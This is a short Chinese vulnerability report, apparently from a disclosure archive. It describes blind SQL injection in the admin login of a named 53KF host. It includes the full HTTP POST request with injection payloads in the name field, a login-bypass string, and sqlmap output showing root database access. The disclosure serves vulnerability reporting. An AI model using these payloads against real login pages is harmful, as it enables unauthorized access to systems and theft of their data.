53KF某后台MySQL盲注(root)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 53KF某后台MySQL盲注(root) ### 详细说明: 注射点: ``` POST /check.php HTTP/1.1 Content-Length: 166 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://hlm.53kf.com Host: hlm.53kf.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4 Accept: */* Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test ``` name可注入,本身是很简单的注入,SQLmap设定--risk=3竟然跑不出来。于是构造了下参数让注入更明显一点: ``` admin' or 1=1* or '1aa'='1 ``` ### 漏洞证明: 用户名输入: admin' or 1=1 or '1'='-- 可以直接登陆后台: [<img src="https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png" alt="53kf.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png) 让SQLmap跑一下: ``` current user: 'root@localhost' current database: 'hlm' available databases [53]:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息